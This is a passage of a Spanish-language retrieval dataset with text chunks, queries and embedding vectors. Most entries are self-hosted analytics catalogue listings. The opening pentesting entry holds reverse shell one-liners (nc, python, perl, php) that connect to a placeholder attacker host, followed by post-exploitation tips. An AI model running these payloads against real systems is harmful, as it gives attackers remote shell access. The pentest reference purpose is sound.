/tmp/f|/bin/sh -i 2>&1|nc TU_IP 4444 >/tmp/f # nc sin -e\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'\nperl -e 'use Socket;...' # cuando solo hay perl\nphp -r '$s=fsockopen(\"TU_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n```\n> MΓ‘s payloads (war/aspx/jsp, x64, encoders) β†’ genera con msfvenom. Referencia viva: revshells.com.", "indexar": "cual es una alternativa libre a los payloads genΓ©ricos que genera msfvenom?", "v": [0.16834, -0.01494, 0.01423, 0.05655, -0.09358, 0.08627, -0.02006, -0.08595, -0.18382, -0.04895, -0.05823, 0.03294, -0.04708, 0.08868, 0.0836, 0.10107, 0.0097, -0.1076, -0.01712, 0.06609, -0.07018, -0.01359, -0.03577, -0.10967, -0.05263, 0.0527, 0.00313, -0.09472, -0.15214, 0.03803, 0.12331, 0.00063, 0.03208, -0.10817, -0.0911, 0.06334, 0.08119, 0.1716, 0.0606, 0.02843, 0.06576, -0.0414, -0.17378, 0.01881, 0.03693, -0.09692, -0.09651, 0.10893, -0.01352, -0.02407, -0.01062, 0.06898, 0.04183, 0.07526, -0.03478, -0.09293, 0.18214, -0.07319, -0.12011, 0.02315, -0.06792, 0.05694, 0.01704, -0.10467, -0.05062, -0.06253, -0.06084, 0.02452, -0.05393, -0.06409, 0.06981, -0.03232, 0.05732, 0.00604, -0.00712, 0.0214, -0.03997, 0.06445, 0.05443, 0.12853, 0.10185, -0.1116, -0.05085, 0.05172, 0.00663, -0.06027, 0.12497, -0.02748, 0.02623, -0.04978, 0.07257, 0.00066, -0.07068, 0.13865, -0.05841, -0.0059, 0.04666, 0.02488, 0.03202, 0.07059, 0.06456, 0.0408, -0.0389, 0.01951, 0.08342, 0.01345, 0.03831, -0.07704, -0.06745, -0.0118, 0.09688, -0.0621, 0.10797, -0.00285, -0.05251, -0.067, 0.01683, 0.05429, 0.00628, -0.02877, -0.02828, -0.0237, -0.0037, -0.03426, -0.02168, -0.00692, -0.03703, 0.07382, -0.01133, 0.13616, 0.01486, 0.02754, -0.04324, -0.03877, -0.08573, -0.10438, 0.11792, -0.00336, 0.0342, 0.01379, 0.0819, 0.10974, 0.06703, 0.00232, 0.02118, -0.03669, 0.01085, -0.12282, -0.01014, -0.05812, -0.04923, -0.01023, -0.04106, 0.05216, -0.02742, -0.03279, 0.01442, -0.00773, -0.00781, 0.08633, -0.01425, 0.03407, -0.00806, -0.04239, -0.01945, -0.04296, -0.03603, -0.05724, -0.07628, 0.04846, -0.01473, -0.00481, 0.05103, -0.08364, 0.03587, -0.03853, -0.1174, -0.09465, 0.09, 0.01808, -0.08087, -0.00515, -0.11541, 0.01528, -0.02433, -0.08083, -0.02537, 0.02445, 0.0713, 0.07728, 0.02299, 0.0774, -0.02396, -0.06316, -0.04768, -0.00718, -0.04582, -0.02332, 0.01523, -0.0413, 0.03281, -0.02375, -0.00136, -0.07251, -0.00356, -0.01833, -0.04347, 0.06315, 0.00535, -0.00062, 0.05852, -0.05444, 0.08999, -0.01604, -0.04024, -0.00382, -0.03214, -0.02316, 0.00603, 0.03803, 0.06671, 0.05685, 0.04302, -0.0176, -0.035, 0.0345, 0.02257, 0.04741, 0.05506, 0.00671, 0.02328, 0.03015, -0.00603, -2e-05, 0.07422, 0.02204, 0.01092, 0.0251, -0.03597, -0.02157, 0.03787, 0.03512, -0.09283, -0.07724, -0.01685, -0.03457, -0.09993, -0.0163, -0.03751, -0.02896, -0.04839, 0.07386, 0.00701, -0.0069, 0.04366, 0.02312]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- **Estabiliza** la shell β†’ Estabilizar shell TTY.\n- Si no conecta, sospecha Egress filtering (prueba 80, 443, 53, 4444).\n- Luego: PEASS-ng β†’ Privesc Linux / Privesc Windows.\n\nRelacionado: Egress filtering Β· msfvenom Β· Metasploit Β· OSCP MOC", "indexar": "que programa sirve para estabilizar una shell TTY cuando no conecta?", "v": [-0.13533, 0.00595, -0.30352, -0.07541, 0.16028, -0.13272, -0.10984, -0.06956, 0.11722, 0.13927, -0.15719, 0.05139, 0.0617, 0.00983, 0.01151, 0.07602, -0.01977, -0.18197, 0.08057, 0.07315, 0.03392, -0.01609, -0.03067, -0.09264, -0.00717, 0.06332, -0.00421, -0.06085, -0.17708, -0.02957, 0.04541, -0.1619, 0.06849, -0.10495, 0.00874, 0.00419, 0.0571, 0.06926, -0.04972, 0.10215, -0.01265, -0.08251, 0.06402, 0.05755, 0.18573, 0.1215, 0.04068, -0.09683, 0.0696, 0.0551, -0.10809, 0.00822, -0.05022, 0.03937, 0.03014, -0.02916, 0.03736, -0.12872, 0.03321, 0.02161, -0.13742, -0.06804, 0.01405, -0.04624, 0.05255, -0.01022, 0.00858, -0.0131, -0.14447, 0.03645, -0.00828, 0.00929, 0.01899, -0.06761, -0.00682, 0.0959, -0.00178, -0.0748, 0.05834, 0.02478, 0.00885, -0.05084, 0.0195, 0.06827, -0.07236, -0.02223, 0.02811, -0.03617, -0.05327, 0.05773, 0.07394, 0.0448, -0.00389, 0.07222, 0.01027, -0.08486, 0.07146, -0.03127, 0.04016, 0.03741, 0.08095, -0.03583, -0.05235, 0.11312, -0.04876, -0.02524, 0.12539, -0.0054, -0.01163, 0.12062, 0.02238, 0.01115, -0.01844, -0.02774, -0.05758, 0.0343, -0.03076, -0.07043, 0.03485, -0.06795, -0.04227, -0.00177, -0.03667, 0.06692, -0.0313, 0.06873, -0.01727, 0.0969, -0.01092, 0.07474, -0.00473, 0.05937, -0.02406, -0.01393, -0.06519, -0.05461, 0.03868, -0.09356, 0.00286, -0.10741, 0.03484, 0.11862, 0.03596, 0.02851, 0.03984, 0.02919, 0.00744, 0.02681, -0.02301, 0.0842, 0.04632, 0.07777, -0.02668, 0.00425, -0.02404, -0.05572, 0.02444, 0.00966, -0.00192, 0.02711, 0.00514, 0.02153, 0.00868, -0.03532, 0.047, -0.09418, -0.06241, 0.00953, 0.08823, 0.04514, 0.01544, 0.07058, 0.03111, -0.03121, -0.03901, -0.05081, -0.02836, -0.06074, 0.03656, -0.02999, -0.05709, -0.00983, 0.0338, -0.02379, 0.00966, 0.001, -0.02224, 0.03358, 0.00927, 0.04176, -0.00081, -0.00703, -0.03117, -0.00371, 0.00935, -0.05236, -0.01016, -0.06507, 0.05389, -0.00335, -0.04095, -0.01451, 0.03764, -0.00997, 0.05683, 0.06804, -0.03062, 0.05, 0.08448, 0.08703, 0.00075, -0.00031, 0.05568, 0.04508, -0.04102, -0.00657, 0.00373, 0.0191, 0.04763, 0.05818, -0.02863, -0.03777, 0.04833, 0.09423, -0.0194, -0.04731, 0.02766, 0.02654, 0.01693, 0.02345, -0.01983, -0.03141, 0.015, -0.02596, -0.04087, -0.00643, -0.00557, -0.04512, -0.01598, -0.06004, -0.00235, 0.07235, -0.02098, -0.06881, -0.00142, -0.03869, -0.03055, 0.0298, 0.03357, -0.02395, -0.06986, 0.0608, 0.04364, -0.04066, 0.05954, 0.03426]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- **Estabiliza** la shell β†’ Estabilizar shell TTY.\n- Si no conecta, sospecha Egress filtering (prueba 80, 443, 53, 4444).\n- Luego: PEASS-ng β†’ Privesc Linux / Privesc Windows.\n\nRelacionado: Egress filtering Β· msfvenom Β· Metasploit Β· OSCP MOC", "indexar": "con que puedo hacer pruebas de privilegios locales en Linux o Windows como PEASS-ng?", "v": [-0.05641, -0.00353, -0.11701, -0.13277, -0.02694, -0.03938, 0.00607, -0.07094, -0.09919, -0.07019, 0.02664, 0.08655, -0.0496, -0.11304, 0.02199, -0.09923, -0.08013, -0.0586, -0.01552, -0.04067, -0.10884, -0.00128, -0.25651, 0.05352, 0.19864, 0.10432, 0.11714, -0.10986, -0.00437, 0.05804, -0.11801, 0.09673, -0.0886, -0.00085, -0.03224, 0.06887, -0.01529, 0.12478, 0.12551, 0.1242, 0.13575, 0.04362, -0.03249, 0.06847, -0.03769, -0.14918, -0.00485, -0.00536, 0.0763, -0.13125, 0.01813, -0.06393, -0.04751, -0.07169, 0.09569, 0.05288, 0.05768, -0.07797, -0.02654, 0.07394, -0.1217, -0.02481, -0.01147, -0.01585, 0.09848, 0.02897, 0.06082, 0.02568, -0.00823, 0.06601, -0.03084, 0.09574, 0.05805, -0.02098, -0.05096, 0.05929, -0.16006, 0.04749, 0.07966, -0.04414, 0.08297, 0.06989, 0.02964, 0.0472, -0.04369, -0.14346, -0.09237, -0.05556, -0.00285, -0.00523, 0.10077, -0.02202, 0.03453, 0.09509, 0.07373, -0.03405, 0.0422, 0.09795, 0.02325, 0.01606, -0.03113, -0.05824, -0.07371, 0.10048, 0.02238, -0.01898, 0.0296, -0.04479, 0.02548, -0.08572, 0.0623, 0.04634, -0.07321, 0.03952, -0.09056, 0.00393, -0.00942, -0.02507, -0.0075, 0.03487, -0.04033, -0.05167, -0.03224, -0.04065, -0.04077, -0.04393, -0.02476, 0.13182, -0.04202, 0.06592, 0.12115, 0.00169, 0.01367, 0.0181, -0.03215, 0.09372, 0.02201, -0.09031, 0.02289, -0.01961, 0.05135, 0.02442, 0.08478, 0.00547, 0.0986, 0.01209, 0.00416, 0.01954, -0.04475, -0.06153, -0.03743, -0.06841, -0.05834, 0.01539, -0.13269, 0.00325, 0.07306, 0.09741, 0.04786, 0.02296, 0.03136, -0.01704, -0.01572, 0.00074, -0.00437, 0.03433, 0.00502, 0.03204, -0.00124, -0.03551, -0.02085, 0.05943, -0.07789, -0.03872, 0.02451, -0.02347, 0.10901, -0.01608, -0.06559, 0.01158, -0.04858, 0.07044, 0.01113, 0.03499, 0.02754, 0.02597, -0.075, 0.04214, 0.03939, -0.00592, -0.00705, 0.01946, 0.03403, -0.0106, -0.0268, 0.03602, -0.02196, 0.00817, -0.04974, 0.0167, -0.11652, -0.02249, -0.05649, -0.03724, 0.04692, 0.04547, -0.06963, 0.03653, -0.00875, 0.02399, -0.0234, 0.00426, 0.06653, -0.05127, -0.0043, -0.01007, 0.06569, -0.0213, -0.01571, -0.01589, -0.0255, 0.01456, 0.09319, 0.01076, 0.00687, -0.06789, -0.03919, -0.01086, 0.02203, -0.01403, 0.03142, 0.00824, 0.02556, -0.00991, 0.02448, 0.02377, 0.0149, 0.00901, 0.00615, -0.03985, -0.03602, 0.09162, -0.00344, -0.07215, -0.06834, -0.06866, -0.06574, -0.01865, 0.01229, -0.02485, 0.00615, -0.04235, 0.0341, -0.0427, -0.05925, 0.05856]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\n- **Estabiliza** la shell β†’ Estabilizar shell TTY.\n- Si no conecta, sospecha Egress filtering (prueba 80, 443, 53, 4444).\n- Luego: PEASS-ng β†’ Privesc Linux / Privesc Windows.\n\nRelacionado: Egress filtering Β· msfvenom Β· Metasploit Β· OSCP MOC", "indexar": "cual es una herramienta para simular filtrado de salida y probar puertos comunes?", "v": [0.15824, 0.02262, -0.17105, -0.17307, 0.05959, -0.1784, 0.04918, -0.06861, -0.07129, -0.12518, -0.09318, 0.05394, 0.10574, -0.01264, -0.04741, -0.09448, 0.04945, -0.07623, -0.01593, 0.00077, -0.04166, -0.00253, -0.06452, -0.11911, -0.06385, 0.0122, 0.06052, -0.04964, -0.12845, -0.08276, 0.03009, 0.04898, 0.19051, -0.09278, -0.02977, -0.14884, -0.03389, -0.01735, 0.05896, 0.09209, 0.05174, 0.05621, -0.04688, -0.03756, 0.02958, -0.04729, -0.11607, -0.08079, 0.0496, -0.02838, -0.05286, -0.07888, -0.11721, 0.03464, -0.04843, -0.1281, 0.14827, -0.10252, 0.03773, -0.1291, 0.0072, -0.04847, 0.05, -0.04649, -0.0335, -0.09526, 0.00901, 0.05014, -0.08321, 0.09054, -0.04303, 0.0528, 0.01017, 0.06182, -0.05272, -0.10604, -0.0181, 0.04291, 0.08218, -0.00778, 0.05053, -0.06443, -0.02033, -0.04456, -0.09231, -0.16924, -0.00524, -0.0137, 0.04274, -0.08256, -0.01874, -0.06167, 0.02272, 0.09363, 0.0126, -0.04367, 0.11117, 0.02299, -0.03461, -0.03132, 0.10341, -0.00086, -0.09401, 0.11488, -0.04835, 0.03437, 0.00847, -0.02656, -0.03458, 0.03211, 0.03636, 0.01192, -0.04908, -0.00349, 0.01871, 0.0736, -0.01016, -0.13267, 0.00324, -0.05361, 0.06468, -0.06554, -0.11333, -0.06269, 0.02054, 0.03246, -0.00544, 0.03625, 0.00337, -0.0244, 0.00461, 0.03604, -0.1135, 0.01885, -0.04691, -0.06736, 0.05806, -0.0802, 0.00484, -0.11807, -0.03395, 0.07049, -0.06221, -0.0982, 0.02915, 0.08972, 0.03743, 0.00544, -0.08788, 0.01961, -0.00529, -0.00734, -0.01188, 0.04106, -0.092, 0.00305, 0.04417, -0.02732, -0.08696, 0.04876, -0.02712, 0.01606, 0.01804, -0.02917, 0.07358, -0.04558, 0.00493, -0.05984, 0.0371, -0.03491, 0.04067, 0.07952, 0.01494, -0.02912, 0.0465, 0.01168, -0.09185, -0.05706, -0.06312, -0.05254, -0.00215, 0.08403, -0.03472, -0.03719, -0.02187, -0.07357, -0.04474, -0.05674, 0.04747, 0.05617, -0.00052, 0.03147, -0.01579, -0.05145, 0.07779, 0.0367, 0.03344, -0.07242, 0.05253, -0.01905, -4e-05, -0.01467, 0.01276, -0.08789, 0.02492, 0.0841, -0.04235, -0.01727, 0.00696, 0.05643, 0.03368, 0.03955, 0.03146, -0.03619, -0.0033, -0.01131, 0.0381, 0.02102, 0.03702, 0.04596, -0.01376, 0.02591, 0.02512, 0.04128, -0.03316, 0.07144, 0.05369, 0.05523, -0.01828, -0.00023, 0.05193, -0.01564, -0.02062, -0.02021, 0.00625, 0.0516, 0.03947, -0.00579, -0.07283, -0.09388, 0.01458, -0.00013, 0.01942, -0.0496, -0.00234, -0.03724, -0.04483, -0.01492, 0.01472, -0.03622, -0.04673, 0.02492, 0.08223, -0.04554, 0.0498, -0.02877]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: ANALOG β€” A minimal analytics tool. Tracks events in a span of 10-30 days [MIT, Nodejs/Docker]. Aptabase β€” Privacy first and simple analytics for mobile and desktop apps [AGPL-3.0, Docker]. AWStats β€” Generate statistics from web, streaming, ftp or mail server logfiles [GPL-3.0, Perl]. Countly Community Edition β€” Real time mobile and web analytics, crash reporting and push notifications platform [AGPL-3.0, Nodejs/Docker]. d8a.tech β€” A data collection service that works with your existing Google Analytics setup to capture user activity and send it straight to your own private database [MIT, Go/Docker]. Daily Stars Explorer β€” Track GitHub repo trends with daily star insights to see growth and community interest over time [⚠, MIT, Go/Nodejs/Docker]. Druid β€” Distributed, column-oriented, real-time analytics data store [Apache-2.0, Java/Docker]. EDA β€” Web application for data analysis and visualization [AGPL-3.0, Nodejs/Docker]. GoAccess β€” Real-time web log analyzer and interactive viewer that runs in a terminal [GPL-2.0, C].", "indexar": "que herramienta sirve para analizar los logs de mis servidores en tiempo real?", "v": [0.00067, 0.09994, -0.12869, -0.16875, 0.01817, -0.16724, -0.04733, -0.08123, -0.01707, -0.0131, -0.06684, -0.08061, 0.07634, -0.08047, 0.1746, 0.03273, 0.09038, -0.1336, -0.00467, 0.06986, 0.01118, -0.00025, -0.07063, 0.01852, -0.0704, 0.00956, 0.09874, -0.10442, -0.16657, 0.07303, -0.08604, 0.02585, 0.01788, -0.09041, -0.0547, -0.01231, -0.02203, 0.12285, -0.0938, 0.12472, 0.05498, 0.04259, -0.07942, -0.01671, 0.03432, -0.04302, -0.04785, -0.01733, -0.00811, 0.03933, -0.09059, -0.11756, -0.05512, 0.0319, -0.0651, -0.15426, 0.08245, -0.10867, 0.08334, -0.07999, -0.19658, 0.02872, -0.07314, -0.05853, 0.10208, 0.00373, 0.06711, -0.08998, -0.03756, -0.04015, -0.13906, 0.05284, -0.00451, -0.09367, 0.01183, -0.02492, 0.00771, 0.04917, 0.04231, 0.01581, 0.09416, -0.0351, -0.0651, 0.11494, -0.12246, -0.05969, 0.05152, -0.03216, 0.02974, -0.01545, -0.0526, 0.1498, 0.02087, 0.05695, 0.04933, 0.03411, 0.15614, -0.11607, 0.05581, -0.00939, 0.11977, -0.04117, -0.04695, 0.03299, -0.00527, 0.10089, 0.00292, -0.04907, 0.00656, -0.03618, 0.02675, -0.03622, -0.05641, 0.02166, 0.01507, -0.01617, 0.0207, -0.09188, -0.06294, -0.00419, 0.02096, 0.01154, -0.02953, -0.00187, -0.03101, -0.05919, 0.01292, -0.06643, 0.06218, -0.04461, -0.02317, -0.01687, -0.15702, 0.03247, -0.06228, -0.06522, 0.03381, -0.04638, -0.04068, -0.05193, 0.01409, 0.09589, -0.09137, -0.06162, 0.06203, 0.02092, 0.01334, -0.00624, -0.07933, -0.04347, 0.0523, -0.04213, -0.00486, 0.02574, -0.0738, -0.05339, -0.04338, -0.02898, -0.15306, 0.02135, 0.02457, -0.02521, 0.01809, 0.01242, 0.04779, -0.10426, 0.04345, 0.03814, 0.13242, 0.03074, 0.01293, 0.00643, 0.04817, -0.08113, -0.01444, -0.04743, -0.0616, -0.027, 0.02407, -0.04482, -0.00374, -0.00754, 0.00213, -0.02138, -0.03381, -0.02212, -0.03492, 0.02053, -0.00853, 0.02386, 0.04766, -0.01999, 0.03597, 0.04494, 0.04857, 0.00702, -0.01369, -0.03768, 0.02277, -0.04251, -0.01076, -0.01092, -0.0132, -0.0007, 0.00298, 0.10258, -0.03034, 0.03946, -0.01517, 0.03683, 0.01742, 0.01654, 0.03754, -0.04392, -0.02422, -0.03998, 0.04826, -0.00655, -0.03535, -0.02568, 0.02647, 0.01453, 0.04276, -0.02702, -0.06648, 0.04567, 0.02245, 0.02207, 0.02313, -0.01168, -0.02259, 0.0162, -0.02582, 0.00417, -0.02345, -0.07376, 0.05553, -0.03282, -0.04242, -0.09254, 0.00747, 0.08818, -0.01056, -0.02914, -0.05686, -0.08264, -0.03688, -0.0259, -0.01564, -0.08833, -0.02463, -0.00166, 0.08249, -0.00556, 0.05325, -0.04897]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: ANALOG β€” A minimal analytics tool. Tracks events in a span of 10-30 days [MIT, Nodejs/Docker]. Aptabase β€” Privacy first and simple analytics for mobile and desktop apps [AGPL-3.0, Docker]. AWStats β€” Generate statistics from web, streaming, ftp or mail server logfiles [GPL-3.0, Perl]. Countly Community Edition β€” Real time mobile and web analytics, crash reporting and push notifications platform [AGPL-3.0, Nodejs/Docker]. d8a.tech β€” A data collection service that works with your existing Google Analytics setup to capture user activity and send it straight to your own private database [MIT, Go/Docker]. Daily Stars Explorer β€” Track GitHub repo trends with daily star insights to see growth and community interest over time [⚠, MIT, Go/Nodejs/Docker]. Druid β€” Distributed, column-oriented, real-time analytics data store [Apache-2.0, Java/Docker]. EDA β€” Web application for data analysis and visualization [AGPL-3.0, Nodejs/Docker]. GoAccess β€” Real-time web log analyzer and interactive viewer that runs in a terminal [GPL-2.0, C].", "indexar": "cual es una alternativa libre y simple para rastrear eventos de aplicaciones mΓ³viles y escritorio?", "v": [0.05914, 0.09615, -0.10334, -0.23538, -0.03248, -0.04828, -0.10179, -0.06193, -0.03497, -0.01946, -0.12031, -0.1975, -0.03735, -0.00193, 0.13087, -0.0287, 0.06768, -0.03343, 0.08586, 0.00337, -0.06018, 0.0601, -0.17937, -0.00107, -0.06235, 0.05916, 0.05139, 0.02976, -0.11402, -0.05638, -0.00467, 0.00376, 0.11684, -0.08306, -0.09594, -0.06705, 0.13495, -0.00091, -0.11476, -0.04271, 0.01747, -0.07134, -0.05845, 0.0881, -0.04525, -0.07341, -0.04723, 0.05372, -0.05748, 0.02073, -0.01477, -0.02996, -0.05586, 0.01052, 0.07182, -0.01706, 0.13437, -0.16315, 0.01614, -0.05694, -0.07748, 0.04995, -0.01933, -0.00093, 0.04583, 0.03676, 0.06835, 0.0424, -0.10779, 0.0424, 0.04217, 0.04423, 0.0851, 0.04627, 0.05131, 0.10432, -0.11194, -0.02569, -0.00322, 0.15294, -0.03402, -0.03478, -0.07184, 0.03525, -0.07199, -0.07345, 0.10717, -0.05191, -0.00169, 0.049, 0.05999, 0.0164, -0.03493, 0.09843, -0.01835, -0.12751, 0.07244, 0.04934, 0.04208, 0.094, 0.05131, -0.07476, -0.06591, -0.0428, -0.08936, -0.03495, -0.0105, 0.02808, -0.04006, -0.04807, -0.00926, -0.04576, 0.01127, 0.08199, -0.02724, -0.05597, 0.02941, -0.01875, 0.01162, -0.06794, -0.07097, -0.06666, 0.0088, -0.04771, 0.03664, 0.01872, 0.06383, 0.12673, -0.03174, 0.07768, 0.15936, -0.12018, -0.14959, 0.00142, -0.11566, -0.01857, 0.06331, -0.05448, 0.08055, 0.00936, 0.06259, 0.05841, -0.02011, -0.04585, 0.07565, 0.016, 0.06046, 0.04587, 0.02052, 0.03156, -0.01576, -0.0013, -0.05901, 0.06017, -0.11979, -0.06771, -0.03662, -0.0316, -0.01295, 0.03966, -0.04109, -0.00547, -0.0304, -0.02042, -0.03335, -0.06411, 0.02862, -0.00072, 0.0488, 0.05141, -0.00112, 0.04943, 0.08921, -0.1107, -0.00637, -0.05976, 0.02101, -0.03213, -0.00111, -0.09389, -0.01699, 0.00311, -0.00294, -0.00555, 0.03879, -0.05067, 0.0346, 0.00589, 0.0097, 0.04033, -0.01077, 0.08705, 0.00244, -0.07965, -0.02054, 0.01151, 0.01258, -0.08506, -0.01217, -0.03289, -0.03558, -0.05346, -0.02772, 0.00312, 0.00707, -0.00635, -0.04133, 0.08789, 0.01228, 0.03211, 0.01253, 0.04229, 0.10971, 0.06935, -0.06431, -0.05437, 0.06474, 0.02704, 0.03706, -0.02038, 0.02006, -0.0171, -0.02159, 0.03444, 0.01157, 0.01512, 0.00684, 0.00203, -0.02588, -0.03819, 0.02703, -0.01516, 0.01908, 0.00812, 0.00944, 0.02751, 0.04106, 0.0213, -0.00568, -0.00403, -0.01832, 0.06129, 0.02274, -0.00741, -0.10079, -0.02059, -0.08143, 0.01705, -0.05203, -0.07259, 0.00808, 0.02001, 0.09798, 0.00616, 0.01403, 0.01239]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: ANALOG β€” A minimal analytics tool. Tracks events in a span of 10-30 days [MIT, Nodejs/Docker]. Aptabase β€” Privacy first and simple analytics for mobile and desktop apps [AGPL-3.0, Docker]. AWStats β€” Generate statistics from web, streaming, ftp or mail server logfiles [GPL-3.0, Perl]. Countly Community Edition β€” Real time mobile and web analytics, crash reporting and push notifications platform [AGPL-3.0, Nodejs/Docker]. d8a.tech β€” A data collection service that works with your existing Google Analytics setup to capture user activity and send it straight to your own private database [MIT, Go/Docker]. Daily Stars Explorer β€” Track GitHub repo trends with daily star insights to see growth and community interest over time [⚠, MIT, Go/Nodejs/Docker]. Druid β€” Distributed, column-oriented, real-time analytics data store [Apache-2.0, Java/Docker]. EDA β€” Web application for data analysis and visualization [AGPL-3.0, Nodejs/Docker]. GoAccess β€” Real-time web log analyzer and interactive viewer that runs in a terminal [GPL-2.0, C].", "indexar": "con que puedo generar estadΓ­sticas a partir de archivos de registro de correo o FTP?", "v": [0.02481, 0.0291, 0.0137, -0.27303, 0.04363, -0.00403, 0.1099, -0.03074, -0.05617, 0.0473, -0.10193, 0.07683, 0.05586, 0.01178, 0.11045, -0.01809, 0.08396, -0.07982, 0.17538, -0.16577, -0.06451, -0.03859, 0.00702, -0.10758, -0.03465, -0.02179, 0.02008, -0.01085, -0.06077, -0.0061, 0.21698, -0.07303, -0.00553, 0.00819, 0.03323, 0.11677, 0.12332, 0.13438, -0.05818, -0.04656, 0.07994, 0.13512, -0.10022, 0.07134, -0.00901, -0.08839, -0.06224, 0.0045, 0.13539, -0.03707, 0.0831, -0.12692, -0.0365, -0.01866, -0.15483, 0.03001, -0.00143, -0.17078, 0.04808, 0.04756, -0.0731, 0.08545, -0.0173, -0.0199, -0.15119, -0.04525, 0.02985, 0.00089, -0.15728, 0.04411, 0.07412, 0.0769, -0.04629, -0.05467, 0.00954, 0.03092, -0.00355, -0.07857, -0.06942, 0.00633, -0.02985, -0.12512, 0.00059, -0.0037, -0.14961, -0.08294, -0.02018, -0.00972, 0.01515, -0.07947, 0.10451, -0.00638, -0.05398, 0.05151, 0.06085, 0.02565, 0.0525, -0.1082, -0.03525, 0.02082, -0.06845, 0.06324, 0.00378, 0.13875, 0.12338, 0.02864, 0.04865, 0.0606, 0.01886, -0.00754, 0.06399, 0.09685, 0.0193, 0.0125, -0.0789, -0.01665, -0.01686, -0.10356, 0.04462, -0.03725, 0.00679, 0.0375, -0.03242, -0.0163, -0.07195, -0.07978, 0.02883, 0.05023, 0.01902, 0.08172, 0.04785, -0.04598, -0.08511, -0.0371, -0.04686, 0.04175, -0.03481, -0.01795, 0.02697, -0.00838, 0.0407, 0.06152, -0.07764, 0.00459, 0.09349, -0.05474, -0.04371, -0.07067, -0.15569, -0.09022, 0.02637, -0.09086, -0.00057, -0.07044, -0.01802, 0.06259, -0.00148, -0.09144, 0.01015, -0.02272, -0.02152, 0.07127, -0.0287, -0.00175, 0.00975, -6e-05, 0.00998, 0.02059, -0.00181, -0.02257, 0.01153, 0.06228, 0.03344, -0.0804, 0.02235, 0.01772, -0.04021, -0.03845, -0.05828, -0.01959, -0.00374, -0.00826, 0.01415, 0.00576, 0.00907, -0.01941, 0.0024, -0.03621, 0.04213, 0.05018, 0.0112, 0.02053, 0.01654, 0.00213, 0.01317, -0.02614, -0.03392, 0.00812, -0.01165, -0.08356, -0.0258, -0.04775, -0.03098, -0.02173, -0.00416, -0.01916, -0.08279, 0.08721, 0.0197, -0.04702, 0.05729, -0.01511, 0.00894, -0.05249, -0.00746, 0.02342, -0.03083, -0.00623, 0.06561, -0.05985, 0.00379, 0.04363, 0.05492, -0.0309, -0.01411, -0.04949, -0.0103, -0.00963, 0.00953, -0.01653, -0.03632, 0.04776, -0.00099, 0.02682, 0.05143, 0.02973, -0.00067, -0.04509, 0.0011, -0.04497, -0.00805, 0.00673, -0.02799, 0.00334, -0.02101, -0.01424, -0.04405, 0.0234, -0.01089, -0.0482, -0.04393, -0.02922, 0.00991, 0.01135, 0.03391, -0.008]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: GoatCounter β€” Easy web statistics without tracking of personal data [EUPL-1.2, Go]. HitKeep β€” Privacy-first web analytics with goals, funnels, ecommerce tracking, and team management in a single binary with embedded DuckDB (alternative to Google Analytics, Plausible, Umami) [MIT, Go/Docker]. Litlyx β€” All-in-one Analytics Solution. Setup in 30 seconds. Display all your data on an AI-powered dashboard. Fully self-hostable and GDPR compliant [Apache-2.0, Docker]. Liwan β€” Privacy-first web analytics [Apache-2.0, Rust/Docker]. Matomo β€” Web analytics that protects your data and your customers' privacy (alternative to Google Analytics) [GPL-3.0, PHP]. Medama Analytics β€” Privacy-first website analytics. Tiny, simple, and cookie-free [Apache-2.0/MIT, Docker/Go]. Metabase β€” Easy way for everyone in your company to ask questions and learn from data [AGPL-3.0, Java/Docker]. Middleware β€” Tool designed to help engineering leaders measure and analyze the effectiveness of their teams using the DORA metrics [Apache-2.0, Docker/Python/Nodejs].", "indexar": "con que programa puedo analizar las estadΓ­sticas de mi web sin rastrear datos personales?", "v": [0.08644, 0.09552, -6e-05, -0.2343, 0.03844, -0.04105, 0.03755, -0.12607, -0.17936, 0.03141, 0.01799, -0.1111, -0.04663, -0.06532, 0.10975, -0.00152, 0.08615, -0.00879, 0.12871, -9e-05, 0.02306, -0.13167, -0.07711, -0.01554, -0.06585, -0.02357, 0.02105, -0.02141, -0.05339, 0.02251, -0.06453, 0.05062, -0.03389, -0.03645, -0.0339, 0.11777, 0.01734, 0.02168, -0.04292, -0.09366, 0.05111, -0.04379, 0.01379, 0.03228, 0.08611, 0.01409, -0.13943, 0.00464, 0.02637, -0.11114, 0.00529, 0.0675, -0.00174, -0.09046, 0.03607, -0.07146, 0.0426, -0.07228, 0.09995, -0.00785, 0.01229, 0.03089, 0.06022, 0.04157, 0.01569, 0.01457, 0.137, -0.0226, -0.10259, 0.0607, 0.07588, 0.11765, -0.05405, -0.04117, 0.09812, -0.02241, 0.079, 0.07935, 0.09227, 0.02069, -0.10944, -0.04316, -0.02884, 0.13568, -0.05861, 0.08099, 0.04268, -0.0535, 0.04315, -0.0364, 0.08605, 0.04412, -0.05928, 0.05641, 